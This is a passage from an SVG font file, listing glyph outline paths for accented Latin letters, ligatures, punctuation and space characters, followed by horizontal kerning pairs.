<glyph unicode="&#xe2;" horiz-adv-x="1126" d="M106 304q0 155 125.5 242.5t340.5 87.5h214v107q0 95 -58 150.5t-164 55.5q-95 0 -154.5 -48.5t-59.5 -116.5h-188l-2 6q-6 118 111.5 216t303.5 98q184 0 296 -93.5t112 -269.5v-521q0 -58 6 -112t22 -106h-203q-10 49 -15.5 86.5t-6.5 75.5q-55 -78 -143.5 -130.5 t-190.5 -52.5q-169 0 -257.5 86.5t-88.5 238.5zM249 1279v26l246 237h120l248 -238v-25h-161l-147 148l-146 -148h-160zM303 300q0 -72 45 -114t133 -42q107 0 193 55t112 126v176h-221q-119 0 -190.5 -60t-71.5 -141z" />
<glyph unicode="&#xe3;" horiz-adv-x="1126" d="M106 304q0 155 125.5 242.5t340.5 87.5h214v107q0 95 -58 150.5t-164 55.5q-95 0 -154.5 -48.5t-59.5 -116.5h-188l-2 6q-6 118 111.5 216t303.5 98q184 0 296 -93.5t112 -269.5v-521q0 -58 6 -112t22 -106h-203q-10 49 -15.5 86.5t-6.5 75.5q-55 -78 -143.5 -130.5 t-190.5 -52.5q-169 0 -257.5 86.5t-88.5 238.5zM208 1306q0 93 59 161.5t150 68.5q56 0 140 -47t136 -47q41 0 71 32.5t30 79.5l108 -32q0 -94 -59.5 -159t-149.5 -65q-71 0 -148 46.5t-128 46.5q-43 0 -72 -32.5t-29 -78.5zM303 300q0 -72 45 -114t133 -42q107 0 193 55 t112 126v176h-221q-119 0 -190.5 -60t-71.5 -141z" />
<glyph unicode="&#xe4;" horiz-adv-x="1126" d="M106 304q0 155 125.5 242.5t340.5 87.5h214v107q0 95 -58 150.5t-164 55.5q-95 0 -154.5 -48.5t-59.5 -116.5h-188l-2 6q-6 118 111.5 216t303.5 98q184 0 296 -93.5t112 -269.5v-521q0 -58 6 -112t22 -106h-203q-10 49 -15.5 86.5t-6.5 75.5q-55 -78 -143.5 -130.5 t-190.5 -52.5q-169 0 -257.5 86.5t-88.5 238.5zM211 1283v200h219v-200h-219zM303 300q0 -72 45 -114t133 -42q107 0 193 55t112 126v176h-221q-119 0 -190.5 -60t-71.5 -141zM681 1283v200h219v-200h-219z" />
<glyph unicode="&#xe5;" horiz-adv-x="1126" d="M106 304q0 155 125.5 242.5t340.5 87.5h214v107q0 95 -58 150.5t-164 55.5q-95 0 -154.5 -48.5t-59.5 -116.5h-188l-2 6q-6 118 111.5 216t303.5 98q184 0 296 -93.5t112 -269.5v-521q0 -58 6 -112t22 -106h-203q-10 49 -15.5 86.5t-6.5 75.5q-55 -78 -143.5 -130.5 t-190.5 -52.5q-169 0 -257.5 86.5t-88.5 238.5zM303 300q0 -72 45 -114t133 -42q107 0 193 55t112 126v176h-221q-119 0 -190.5 -60t-71.5 -141zM346 1412q0 84 60.5 141t147.5 57q85 0 145 -56.5t60 -141.5q0 -86 -59.5 -140t-145.5 -54q-87 0 -147.5 54t-60.5 140z M449 1412q0 -43 31 -73.5t74 -30.5q42 0 72 29.5t30 74.5t-30 76t-72 31q-43 0 -74 -31t-31 -76z" />
<glyph unicode="&#xe6;" horiz-adv-x="1729" d="M58 304q0 158 115 244.5t335 86.5h229v85q0 106 -51.5 166.5t-149.5 60.5q-103 0 -164 -55t-61 -133l-188 18l-2 6q-5 138 109.5 228.5t305.5 90.5q114 0 201.5 -40.5t137.5 -117.5q64 75 151.5 116.5t188.5 41.5q214 0 329.5 -130t115.5 -358v-119h-709l-2 -5 q1 -159 79.5 -258t233.5 -99q103 0 169.5 27.5t144.5 78.5l67 -138q-53 -44 -147 -83t-234 -39q-136 0 -240 48.5t-170 138.5q-56 -79 -167.5 -133t-271.5 -54q-170 0 -262.5 87t-92.5 238zM255 300q0 -74 50 -120.5t147 -46.5q76 0 159 43.5t126 100.5v216h-227 q-120 0 -187.5 -56t-67.5 -137zM953 645l2 -5h508v31q0 122 -60 199t-188 77q-113 0 -182 -84.5t-80 -217.5z" />
<glyph unicode="&#xe7;" horiz-adv-x="1087" d="M97 520v42q0 231 125.5 385.5t360.5 154.5q190 0 310.5 -112t116.5 -275l-2 -6h-178q0 99 -70 168.5t-177 69.5q-155 0 -221.5 -111.5t-66.5 -273.5v-42q0 -166 66 -276.5t222 -110.5q98 0 172.5 60.5t74.5 148.5h177l2 -6q5 -140 -124.5 -248.5t-301.5 -108.5 q-236 0 -361 154t-125 387zM440 -334q72 0 116 24.5t44 73.5q0 48 -36 67t-123 26l32 135h140l-12 -52q65 -11 108 -52t43 -121q0 -96 -79 -153t-226 -57z" />
<glyph unicode="&#xe8;" horiz-adv-x="1083" d="M99 520v44q0 231 137.5 384.5t325.5 153.5q219 0 331 -132t112 -352v-123h-702l-3 -5q3 -156 79 -256.5t213 -100.5q100 0 175.5 28.5t130.5 78.5l77 -128q-58 -57 -153 -95t-230 -38q-226 0 -359.5 150.5t-133.5 390.5zM233 1499l3 6h230l175 -266h-158zM307 654l2 -5 h499v26q0 116 -62 194t-184 78q-99 0 -169 -83.5t-86 -209.5z" />
<glyph unicode="&#xe9;" horiz-adv-x="1083" d="M99 520v44q0 231 137.5 384.5t325.5 153.5q219 0 331 -132t112 -352v-123h-702l-3 -5q3 -156 79 -256.5t213 -100.5q100 0 175.5 28.5t130.5 78.5l77 -128q-58 -57 -153 -95t-230 -38q-226 0 -359.5 150.5t-133.5 390.5zM307 654l2 -5h499v26q0 116 -62 194t-184 78 q-99 0 -169 -83.5t-86 -209.5zM468 1235l185 266h230l2 -6l-270 -260h-147z" />
<glyph unicode="&#xea;" horiz-adv-x="1083" d="M99 520v44q0 231 137.5 384.5t325.5 153.5q219 0 331 -132t112 -352v-123h-702l-3 -5q3 -156 79 -256.5t213 -100.5q100 0 175.5 28.5t130.5 78.5l77 -128q-58 -57 -153 -95t-230 -38q-226 0 -359.5 150.5t-133.5 390.5zM252 1280v26l246 237h120l248 -238v-25h-161 l-147 148l-146 -148h-160zM307 654l2 -5h499v26q0 116 -62 194t-184 78q-99 0 -169 -83.5t-86 -209.5z" />
<glyph unicode="&#xeb;" horiz-adv-x="1083" d="M99 520v44q0 231 137.5 384.5t325.5 153.5q219 0 331 -132t112 -352v-123h-702l-3 -5q3 -156 79 -256.5t213 -100.5q100 0 175.5 28.5t130.5 78.5l77 -128q-58 -57 -153 -95t-230 -38q-226 0 -359.5 150.5t-133.5 390.5zM214 1284v200h219v-200h-219zM307 654l2 -5h499 v26q0 116 -62 194t-184 78q-99 0 -169 -83.5t-86 -209.5zM684 1284v200h219v-200h-219z" />
<glyph unicode="&#xec;" horiz-adv-x="515" d="M-71 1477l3 6h230l175 -266h-158zM153 0v1082h197v-1082h-197z" />
<glyph unicode="&#xed;" horiz-adv-x="515" d="M153 0v1082h197v-1082h-197zM162 1213l185 266h230l2 -6l-270 -260h-147z" />
<glyph unicode="&#xee;" horiz-adv-x="515" d="M-52 1258v26l246 237h120l248 -238v-25h-161l-147 148l-146 -148h-160zM153 0v1082h197v-1082h-197z" />
<glyph unicode="&#xef;" horiz-adv-x="515" d="M-90 1262v200h219v-200h-219zM153 0v1082h197v-1082h-197zM380 1262v200h219v-200h-219z" />
<glyph unicode="&#xf0;" horiz-adv-x="1202" d="M72 466q0 228 138 370t351 142q90 0 169.5 -37t131.5 -97l4 5q-9 109 -51.5 197t-110.5 154l-290 -165l-77 102l256 146q-39 22 -80.5 39t-85.5 31l60 164q79 -19 151 -52t135 -79l218 125l77 -102l-195 -112q95 -104 147 -241.5t52 -300.5v-220q0 -245 -144 -400.5 t-359 -155.5q-218 0 -357.5 140t-139.5 347zM269 466q0 -132 82 -232.5t222 -100.5q133 0 217.5 114t84.5 288v148q-35 59 -115.5 99.5t-198.5 40.5q-131 0 -211.5 -104t-80.5 -253z" />
<glyph unicode="&#xf1;" d="M143 0v1082h176l14 -161q54 86 135.5 133.5t185.5 47.5q175 0 271 -102.5t96 -316.5v-683h-197v679q0 143 -56.5 203t-172.5 60q-85 0 -150.5 -41t-104.5 -112v-789h-197zM231 1306q0 93 59 161.5t150 68.5q56 0 140 -47t136 -47q41 0 71 32.5t30 79.5l108 -32 q0 -94 -59.5 -159t-149.5 -65q-71 0 -148 46.5t-128 46.5q-43 0 -72 -32.5t-29 -78.5z" />
<glyph unicode="&#xf2;" d="M97 529v22q0 240 130 395.5t353 155.5q225 0 355.5 -155t130.5 -396v-22q0 -242 -130 -396t-354 -154t-354.5 154.5t-130.5 395.5zM257 1498l3 6h230l175 -266h-158zM294 529q0 -172 72.5 -284t215.5 -112q141 0 214 112t73 284v22q0 170 -73.5 283t-215.5 113 q-141 0 -213.5 -113t-72.5 -283v-22z" />
<glyph unicode="&#xf3;" d="M97 529v22q0 240 130 395.5t353 155.5q225 0 355.5 -155t130.5 -396v-22q0 -242 -130 -396t-354 -154t-354.5 154.5t-130.5 395.5zM294 529q0 -172 72.5 -284t215.5 -112q141 0 214 112t73 284v22q0 170 -73.5 283t-215.5 113q-141 0 -213.5 -113t-72.5 -283v-22z M492 1234l185 266h230l2 -6l-270 -260h-147z" />
<glyph unicode="&#xf4;" d="M97 529v22q0 240 130 395.5t353 155.5q225 0 355.5 -155t130.5 -396v-22q0 -242 -130 -396t-354 -154t-354.5 154.5t-130.5 395.5zM276 1279v26l246 237h120l248 -238v-25h-161l-147 148l-146 -148h-160zM294 529q0 -172 72.5 -284t215.5 -112q141 0 214 112t73 284v22 q0 170 -73.5 283t-215.5 113q-141 0 -213.5 -113t-72.5 -283v-22z" />
<glyph unicode="&#xf5;" d="M97 529v22q0 240 130 395.5t353 155.5q225 0 355.5 -155t130.5 -396v-22q0 -242 -130 -396t-354 -154t-354.5 154.5t-130.5 395.5zM235 1306q0 93 59 161.5t150 68.5q56 0 140 -47t136 -47q41 0 71 32.5t30 79.5l108 -32q0 -94 -59.5 -159t-149.5 -65q-71 0 -148 46.5 t-128 46.5q-43 0 -72 -32.5t-29 -78.5zM294 529q0 -172 72.5 -284t215.5 -112q141 0 214 112t73 284v22q0 170 -73.5 283t-215.5 113q-141 0 -213.5 -113t-72.5 -283v-22z" />
<glyph unicode="&#xf6;" d="M97 529v22q0 240 130 395.5t353 155.5q225 0 355.5 -155t130.5 -396v-22q0 -242 -130 -396t-354 -154t-354.5 154.5t-130.5 395.5zM238 1283v200h219v-200h-219zM294 529q0 -172 72.5 -284t215.5 -112q141 0 214 112t73 284v22q0 170 -73.5 283t-215.5 113 q-141 0 -213.5 -113t-72.5 -283v-22zM708 1283v200h219v-200h-219z" />
<glyph unicode="&#xf7;" horiz-adv-x="1170" d="M71 597v188h998v-188h-998zM472 180v203h198v-203h-198zM472 999v203h198v-203h-198z" />
<glyph unicode="&#xf8;" d="M97 529v22q0 240 130 395.5t353 155.5q56 0 107.5 -11t97.5 -31l74 149h129l-104 -211q88 -74 135 -190t47 -257v-22q0 -242 -130 -396t-354 -154q-51 0 -97 8.5t-88 24.5l-72 -147h-129l100 204q-96 71 -147.5 191t-51.5 269zM294 529q0 -91 20 -166.5t61 -123.5h6 l332 674q-29 16 -62.5 25t-70.5 9q-141 0 -213.5 -113t-72.5 -283v-22zM469 156q24 -12 52 -17.5t61 -5.5q141 0 214 112t73 284v22q0 80 -17.5 150.5t-49.5 117.5h-6z" />
<glyph unicode="&#xf9;" d="M139 444v638h197v-640q0 -173 51 -238t159 -65q105 0 173.5 42.5t103.5 120.5v780h197v-1082h-177l-13 160q-51 -87 -131 -134t-185 -47q-177 0 -276 113t-99 352zM255 1477l3 6h230l175 -266h-158z" />
<glyph unicode="&#xfa;" d="M139 444v638h197v-640q0 -173 51 -238t159 -65q105 0 173.5 42.5t103.5 120.5v780h197v-1082h-177l-13 160q-51 -87 -131 -134t-185 -47q-177 0 -276 113t-99 352zM490 1213l185 266h230l2 -6l-270 -260h-147z" />
<glyph unicode="&#xfb;" d="M139 444v638h197v-640q0 -173 51 -238t159 -65q105 0 173.5 42.5t103.5 120.5v780h197v-1082h-177l-13 160q-51 -87 -131 -134t-185 -47q-177 0 -276 113t-99 352zM274 1258v26l246 237h120l248 -238v-25h-161l-147 148l-146 -148h-160z" />
<glyph unicode="&#xfc;" d="M139 444v638h197v-640q0 -173 51 -238t159 -65q105 0 173.5 42.5t103.5 120.5v780h197v-1082h-177l-13 160q-51 -87 -131 -134t-185 -47q-177 0 -276 113t-99 352zM236 1262v200h219v-200h-219zM706 1262v200h219v-200h-219z" />
<glyph unicode="&#xfd;" horiz-adv-x="1030" d="M26 1082h220l228 -681l35 -136h6l266 817h219l-455 -1248q-41 -109 -117.5 -190t-206.5 -81q-24 0 -61 5.5t-57 10.5l20 155q-6 1 35.5 -2t52.5 -3q63 0 103 56t67 124l47 113zM424 1213l185 266h230l2 -6l-270 -260h-147z" />
<glyph unicode="&#xfe;" horiz-adv-x="1186" d="M153 -416v1976h197v-598q53 68 128 104t173 36q201 0 312.5 -159.5t111.5 -421.5v-21q0 -234 -112 -377.5t-309 -143.5q-100 0 -175.5 33.5t-128.5 100.5v-529h-197zM350 275q37 -67 97 -104.5t147 -37.5q140 0 212 102.5t72 264.5v21q0 184 -72.5 302.5t-213.5 118.5 q-85 0 -145 -38.5t-97 -105.5v-523z" />
<glyph unicode="&#xff;" horiz-adv-x="1030" d="M26 1082h220l228 -681l35 -136h6l266 817h219l-455 -1248q-41 -109 -117.5 -190t-206.5 -81q-24 0 -61 5.5t-57 10.5l20 155q-6 1 35.5 -2t52.5 -3q63 0 103 56t67 124l47 113zM170 1262v200h219v-200h-219zM640 1262v200h219v-200h-219z" />
<glyph unicode="&#x152;" horiz-adv-x="1960" d="M104 576v304q0 265 154.5 431t403.5 166q69 0 140.5 -6t150.5 -15h907v-155h-758v-471h667v-155h-667v-521h769v-154h-918q-92 -10 -157 -15.5t-132 -5.5q-249 0 -404.5 166t-155.5 431zM301 576q0 -214 97 -328t266 -114q61 0 122 4.5t119 13.5v1151q-61 8 -122 13.5 t-121 5.5q-169 0 -265 -113.5t-96 -326.5v-306z" />
<glyph unicode="&#x153;" horiz-adv-x="1854" d="M97 529v22q0 240 130 395.5t353 155.5q130 0 230 -54.5t164 -152.5q65 97 161.5 152t204.5 55q219 0 331 -132t112 -352v-123h-702l-3 -5q3 -156 79 -256.5t213 -100.5q100 0 175.5 28.5t130.5 78.5l77 -128q-58 -57 -153 -95t-230 -38q-131 0 -232.5 52.5t-166.5 148.5 q-64 -96 -163 -148.5t-226 -52.5q-224 0 -354.5 154.5t-130.5 395.5zM294 529q0 -172 72.5 -284t215.5 -112q141 0 214 112t73 284v22q0 170 -73.5 283t-215.5 113q-141 0 -213.5 -113t-72.5 -283v-22zM1085 654l2 -5h499v26q0 116 -62 194t-184 78q-99 0 -169 -83.5 t-86 -209.5z" />
<glyph unicode="&#x178;" horiz-adv-x="1250" d="M20 1456h225l380 -740l380 740h225l-511 -944v-512h-196v525zM281 1604v200h219v-200h-219zM751 1604v200h219v-200h-219z" />
<glyph unicode="&#x2c6;" horiz-adv-x="979" d="M171 1252v26l246 237h120l248 -238v-25h-161l-147 148l-146 -148h-160z" />
<glyph unicode="&#x2dc;" horiz-adv-x="979" d="M135 1275q0 93 59 161.5t150 68.5q56 0 140 -47t136 -47q41 0 71 32.5t30 79.5l108 -32q0 -94 -59.5 -159t-149.5 -65q-71 0 -148 46.5t-128 46.5q-43 0 -72 -32.5t-29 -78.5z" />
<glyph unicode="&#x2000;" horiz-adv-x="966" />
<glyph unicode="&#x2001;" horiz-adv-x="1932" />
<glyph unicode="&#x2002;" horiz-adv-x="966" />
<glyph unicode="&#x2003;" horiz-adv-x="1932" />
<glyph unicode="&#x2004;" horiz-adv-x="644" />
<glyph unicode="&#x2005;" horiz-adv-x="483" />
<glyph unicode="&#x2006;" horiz-adv-x="322" />
<glyph unicode="&#x2007;" horiz-adv-x="322" />
<glyph unicode="&#x2008;" horiz-adv-x="241" />
<glyph unicode="&#x2009;" horiz-adv-x="386" />
<glyph unicode="&#x200a;" horiz-adv-x="107" />
<glyph unicode="&#x2010;" horiz-adv-x="561" d="M35 538v154h490v-154h-490z" />
<glyph unicode="&#x2011;" horiz-adv-x="561" d="M35 538v154h490v-154h-490z" />
<glyph unicode="&#x2012;" horiz-adv-x="561" d="M35 538v154h490v-154h-490z" />
<glyph unicode="&#x2013;" horiz-adv-x="1416" d="M169 648v155h1086v-155h-1086z" />
<glyph unicode="&#x2014;" horiz-adv-x="1660" d="M141 648v155h1336v-155h-1336z" />
<glyph unicode="&#x2018;" horiz-adv-x="418" d="M80 1020v184l160 356h97l-60 -362v-178h-197z" />
<glyph unicode="&#x2019;" horiz-adv-x="418" d="M80 1021l60 343v196h197v-193l-160 -346h-97z" />
<glyph unicode="&#x201a;" horiz-adv-x="417" d="M80 -255l60 263v241h197v-223l-160 -281h-97z" />
<glyph unicode="&#x201c;" horiz-adv-x="744" d="M80 1020v184l160 356h97l-60 -362v-178h-197zM409 1020v184l160 356h97l-60 -362v-178h-197z" />
<glyph unicode="&#x201d;" horiz-adv-x="752" d="M80 1021l60 343v196h197v-193l-160 -346h-97zM417 1021l60 343v196h197v-193l-160 -346h-97z" />
<glyph unicode="&#x201e;" horiz-adv-x="726" d="M80 -239l60 325v194h197v-184l-160 -335h-97zM388 -239l60 333v186h197v-184l-160 -335h-97z" />
<glyph unicode="&#x2022;" horiz-adv-x="695" d="M137 733v60q0 88 56 144t150 56q95 0 151.5 -56t56.5 -144v-60q0 -89 -56 -143.5t-151 -54.5t-151 55t-56 143z" />
<glyph unicode="&#x2026;" horiz-adv-x="1380" d="M161 0v202h197v-202h-197zM604 0v202h197v-202h-197zM1024 0v202h197v-202h-197z" />
<glyph unicode="&#x202f;" horiz-adv-x="386" />
<glyph unicode="&#x2039;" horiz-adv-x="615" d="M108 541v19l295 389h148l-255 -399l255 -398h-148z" />
<glyph unicode="&#x203a;" horiz-adv-x="615" d="M88 152l255 398l-255 399h148l295 -389v-19l-295 -389h-148z" />
<glyph unicode="&#x205f;" horiz-adv-x="483" />
<glyph unicode="&#x20ac;" horiz-adv-x="1088" d="M79 481v155h146v136h-146v155h146v15q0 244 141.5 389.5t372.5 145.5q59 0 117.5 -8t124.5 -23l-19 -159q-54 16 -110.5 25.5t-112.5 9.5q-146 0 -231.5 -103t-85.5 -275v-17h492v-155h-492v-136h492v-155h-485l-2 -5q-4 -138 81.5 -240.5t232.5 -102.5q57 0 113 8.5 t108 25.5l19 -157q-56 -15 -117.5 -23t-122.5 -8q-231 0 -373.5 144.5t-142.5 357.5h-146z" />
<glyph unicode="&#x2122;" horiz-adv-x="1284" d="M103 1374v82h384v-82h-145v-455h-94v455h-145zM565 919v537h116l161 -390h6l162 390h110v-537h-93v343l-6 2l-150 -345h-51l-156 359l-6 -2v-357h-93z" />
<glyph unicode="&#xe000;" horiz-adv-x="1080" d="M0 0v1080h1080v-1080h-1080z" />
<glyph unicode="&#xfb02;" horiz-adv-x="1223" d="M56 936v146h169v137q0 173 90.5 267.5t252.5 94.5q34 0 68.5 -5.5t76.5 -15.5l-24 -150q-18 4 -43.5 7t-53.5 3q-86 0 -128 -51.5t-42 -149.5v-137h225v-146h-225v-936h-197v936h-169zM866 0v1560h197v-1560h-197z" />
<glyph unicode="&#xfb03;" horiz-adv-x="1847" d="M56 936v146h169v137q0 173 90.5 267.5t252.5 94.5q34 0 68.5 -5.5t76.5 -15.5l-24 -150q-18 4 -43.5 7t-53.5 3q-86 0 -128 -51.5t-42 -149.5v-137h225v-146h-225v-936h-197v936h-169zM735 936v146h170v117q0 182 106.5 282t295.5 100q67 0 132 -15.5t153 -45.5l-34 -160 q-53 21 -113 36t-123 15q-117 0 -168.5 -52t-51.5 -160v-117h215v-146h-215v-936h-197v936h-170zM1490 0v1082h198v-1082h-198z" />
<glyph unicode="&#xfb04;" horiz-adv-x="1930" d="M56 936v146h169v137q0 173 90.5 267.5t252.5 94.5q34 0 68.5 -5.5t76.5 -15.5l-24 -150q-18 4 -43.5 7t-53.5 3q-86 0 -128 -51.5t-42 -149.5v-137h225v-146h-225v-936h-197v936h-169zM763 936v146h169v137q0 173 90.5 267.5t252.5 94.5q34 0 68.5 -5.5t76.5 -15.5 l-24 -150q-18 4 -43.5 7t-53.5 3q-86 0 -128 -51.5t-42 -149.5v-137h225v-146h-225v-936h-197v936h-169zM1573 0v1560h197v-1560h-197z" />
<hkern u1="&#x22;" u2="w" k="-11" />
<hkern u1="&#x27;" u2="w" k="-11" />
<hkern u1="&#x28;" u2="&#x178;" k="-22" />
<hkern u1="&#x28;" u2="&#xdd;" k="-22" />
<hkern u1="&#x28;" u2="Y" k="-22" />
<hkern u1="&#x28;" u2="W" k="-37" />
<hkern u1="&#x28;" u2="V" k="-20" />
<hkern u1="A" u2="w" k="33" />
<hkern u1="A" u2="t" k="17" />
<hkern u1="A" u2="&#x3f;" k="80" />
<hkern u1="C" u2="&#x7d;" k="17" />
<hkern u1="C" u2="]" k="12" />
<hkern u1="C" u2="&#x29;" k="26" />
<hkern u1="D" u2="&#xc6;" k="33" />
<hkern u1="E" u2="w" k="22" />
<hkern u1="E" u2="f" k="18" />
<hkern u1="F" u2="&#x2026;" k="273" />
<hkern u1="F" u2="&#x201e;" k="273" />
<hkern u1="F" u2="&#x201a;" k="273" />
<hkern u1="F" u2="&#x153;" k="21" />
<hkern u1="F" u2="&#xff;" k="24" />
<hkern u1="F" u2="&#xfd;" k="24" />
<hkern u1="F" u2="&#xfc;" k="22" />
<hkern u1="F" u2="&#xfb;" k="22" />
<hkern u1="F" u2="&#xfa;" k="22" />
<hkern u1="F" u2="&#xf9;" k="22" />
<hkern u1="F" u2="&#xf6;" k="21" />
<hkern u1="F" u2="&#xf5;" k="21" />
<hkern u1="F" u2="&#xf4;" k="21" />
<hkern u1="F" u2="&#xf3;" k="21" />
<hkern u1="F" u2="&#xf2;" k="21" />
<hkern u1="F" u2="&#xeb;" k="21" />
<hkern u1="F" u2="&#xea;" k="21" />
<hkern u1="F" u2="&#xe9;" k="21" />
<hkern u1="F" u2="&#xe8;" k="21" />
<hkern u1="F" u2="&#xe7;" k="21" />
<hkern u1="F" u2="&#xe5;" k="34" />
<hkern u1="F" u2="&#xe4;" k="34" />
<hkern u1="F" u2="&#xe3;" k="34" />
<hkern u1="F" u2="&#xe2;" k="34" />
<hkern u1="F" u2="&#xe1;" k="34" />
<hkern u1="F" u2="&#xe0;" k="34" />
<hkern u1="F" u2="&#xc5;" k="59" />
<hkern u1="F" u2="&#xc4;" k="59" />
<hkern u1="F" u2="&#xc3;" k="59" />
<hkern u1="F" u2="&#xc2;" k="59" />
<hkern u1="F" u2="&#xc1;" k="59" />
<hkern u1="F" u2="&#xc0;" k="59" />
<hkern u1="F" u2="y" k="24" />
<hkern u1="F" u2="v" k="24" />
<hkern u1="F" u2="u" k="22" />
<hkern u1="F" u2="r" k="26" />
<hkern u1="F" u2="q" k="21" />
<hkern u1="F" u2="o" k="21" />
<hkern u1="F" u2="g" k="21" />
<hkern u1="F" u2="e" k="21" />
<hkern u1="F" u2="d" k="21" />
<hkern u1="F" u2="c" k="21" />
<hkern u1="F" u2="a" k="34" />
<hkern u1="F" u2="T" k="-20" />
<hkern u1="F" u2="A" k="59" />
<hkern u1="F" u2="&#x3a;" k="273" />
<hkern u1="F" u2="&#x2e;" k="273" />
<hkern u1="F" u2="&#x2c;" k="273" />
<hkern u1="K" u2="w" k="63" />
<hkern u1="L" u2="w" k="52" />
<hkern u1="O" u2="&#xc6;" k="33" />
<hkern u1="P" u2="&#xc6;" k="293" />
<hkern u1="P" u2="t" k="-14" />
<hkern u1="Q" u2="&#x178;" k="35" />
<hkern u1="Q" u2="&#xdd;" k="35" />
<hkern u1="Q" u2="Y" k="35" />
<hkern u1="Q" u2="W" k="20" />
<hkern u1="Q" u2="V" k="28" />
<hkern u1="Q" u2="T" k="33" />
<hkern u1="R" u2="&#x178;" k="48" />
<hkern u1="R" u2="&#xdd;" k="48" />
<hkern u1="R" u2="Y" k="48" />
<hkern u1="R" u2="V" k="19" />
<hkern u1="R" u2="T" k="50" />
<hkern u1="T" u2="&#xf8;" k="95" />
<hkern u1="T" u2="&#xe6;" k="84" />
<hkern u1="T" u2="&#xc6;" k="188" />
<hkern u1="T" u2="&#xbb;" k="147" />
<hkern u1="T" u2="&#xab;" k="151" />
<hkern u1="T" u2="w" k="47" />
<hkern u1="T" u2="r" k="65" />
<hkern u1="V" u2="&#x7d;" k="-19" />
<hkern u1="V" u2="r" k="30" />
<hkern u1="V" u2="]" k="-17" />
<hkern u1="V" u2="&#x29;" k="-20" />
<hkern u1="W" u2="&#x7d;" k="-14" />
<hkern u1="W" u2="r" k="21" />
<hkern u1="W" u2="]" k="-12" />
<hkern u1="W" u2="&#x29;" k="-15" />
<hkern u1="Y" u2="&#x2022;" k="45" />
<hkern u1="Y" u2="&#xf8;" k="64" />
<hkern u1="Y" u2="&#xe6;" k="63" />
<hkern u1="Y" u2="&#xc6;" k="96" />
<hkern u1="Y" u2="&#xbb;" k="51" />
<hkern u1="Y" u2="&#xab;" k="82" />
<hkern u1="Y" u2="&#x7d;" k="-19" />
<hkern u1="Y" u2="t" k="22" />
<hkern u1="Y" u2="r" k="40" />
<hkern u1="Y" u2="f" k="22" />
<hkern u1="Y" u2="]" k="-18" />
<hkern u1="Y" u2="&#x2a;" k="49" />
<hkern u1="Y" u2="&#x29;" k="-20" />
<hkern u1="Y" u2="&#x26;" k="30" />
<hkern u1="Z" u2="w" k="27" />
<hkern u1="[" u2="&#xdc;" k="18" />
<hkern u1="[" u2="&#xdb;" k="18" />
<hkern u1="[" u2="&#xda;" k="18" />
<hkern u1="[" u2="&#xd9;" k="18" />
<hkern u1="[" u2="U" k="18" />
<hkern u1="[" u2="J" k="18" />
<hkern u1="f" u2="&#x201d;" k="-16" />
<hkern u1="f" u2="&#x201c;" k="-16" />
<hkern u1="f" u2="&#x2019;" k="-16" />
<hkern u1="f" u2="&#x2018;" k="-16" />
<hkern u1="f" u2="&#x153;" k="24" />
<hkern u1="f" u2="&#xeb;" k="24" />
<hkern u1="f" u2="&#xea;" k="24" />
<hkern u1="f" u2="&#xe9;" k="24" />
<hkern u1="f" u2="&#xe8;" k="24" />
<hkern u1="f" u2="&#xe7;" k="24" />
<hkern u1="f" u2="&#x7d;" k="-19" />
<hkern u1="f" u2="q" k="24" />
<hkern u1="f" u2="g" k="24" />
<hkern u1="f" u2="e" k="24" />
<hkern u1="f" u2="d" k="24" />
<hkern u1="f" u2="c" k="24" />
<hkern u1="f" u2="]" k="-18" />
<hkern u1="f" u2="&#x29;" k="-20" />
<hkern u1="f" u2="&#x27;" k="-16" />
<hkern u1="f" u2="&#x22;" k="-16" />
<hkern u1="k" u2="&#x153;" k="20" />
<hkern u1="k" u2="&#xeb;" k="20" />
<hkern u1="k" u2="&#xea;" k="20" />
<hkern u1="k" u2="&#xe9;" k="20" />
<hkern u1="k" u2="&#xe8;" k="20" />
<hkern u1="k" u2="&#xe7;" k="20" />
<hkern u1="k" u2="q" k="20" />
<hkern u1="k" u2="g" k="20" />
<hkern u1="k" u2="e" k="20" />
<hkern u1="k" u2="d" k="20" />
<hkern u1="k" u2="c" k="20" />
<hkern u1="r" u2="w" k="-17" />
<hkern u1="r" u2="t" k="-17" />
<hkern u1="r" u2="f" k="-15" />
<hkern u1="v" u2="f" k="-13" />
<hkern u1="w" u2="&#x2026;" k="124" />
<hkern u1="w" u2="&#x201e;" k="124" />
<hkern u1="w" u2="&#x201a;" k="124" />
<hkern u1="w" u2="&#x3a;" k="124" />
<hkern u1="w" u2="&#x2e;" k="124" />
<hkern u1="w" u2="&#x2c;" k="124" />
<hkern u1="y" u2="f" k="-13" />
<hkern u1="&#x7b;" u2="&#xdc;" k="20" />
<hkern u1="&#x7b;" u2="&#xdb;" k="20" />
<hkern u1="&#x7b;" u2="&#xda;" k="20" />
<hkern u1="&#x7b;" u2="&#xd9;" k="20" />
<hkern u1="&#x7b;" u2="U" k="20" />
<hkern u1="&#x7b;" u2="J" k="20" />
<hkern u1="&#xc0;" u2="w" k="33" />
<hkern u1="&#xc0;" u2="t" k="17" />
<hkern u1="&#xc0;" u2="&#x3f;" k="80" />
<hkern u1="&#xc1;" u2="w" k="33" />
<hkern u1="&#xc1;" u2="t" k="17" />
<hkern u1="&#xc1;" u2="&#x3f;" k="80" />
<hkern u1="&#xc2;" u2="w" k="33" />
<hkern u1="&#xc2;" u2="t" k="17" />
<hkern u1="&#xc2;" u2="&#x3f;" k="80" />
<hkern u1="&#xc3;" u2="w" k="33" />
<hkern u1="&#xc3;" u2="t" k="17" />
<hkern u1="&#xc3;" u2="&#x3f;" k="80" />
<hkern u1="&#xc4;" u2="w" k="33" />
<hkern u1="&#xc4;" u2="t" k="17" />
<hkern u1="&#xc4;" u2="&#x3f;" k="80" />
<hkern u1="&#xc5;" u2="w" k="33" />
<hkern u1="&#xc5;" u2="t" k="17" />
<hkern u1="&#xc5;" u2="&#x3f;" k="80" />
<hkern u1="&#xc7;" u2="&#x7d;" k="17" />
<hkern u1="&#xc7;" u2="]" k="12" />
<hkern u1="&#xc7;" u2="&#x29;" k="26" />
<hkern u1="&#xc8;" u2="w" k="22" />
<hkern u1="&#xc8;" u2="f" k="18" />
<hkern u1="&#xc9;" u2="w" k="22" />
<hkern u1="&#xc9;" u2="f" k="18" />
<hkern u1="&#xca;" u2="w" k="22" />
<hkern u1="&#xca;" u2="f" k="18" />
<hkern u1="&#xcb;" u2="w" k="22" />
<hkern u1="&#xcb;" u2="f" k="18" />
<hkern u1="&#xd0;" u2="&#xc6;" k="33" />
<hkern u1="&#xd2;" u2="&#xc6;" k="33" />
<hkern u1="&#xd3;" u2="&#xc6;" k="33" />
<hkern u1="&#xd4;" u2="&#xc6;" k="33" />
<hkern u1="&#xd5;" u2="&#xc6;" k="33" />
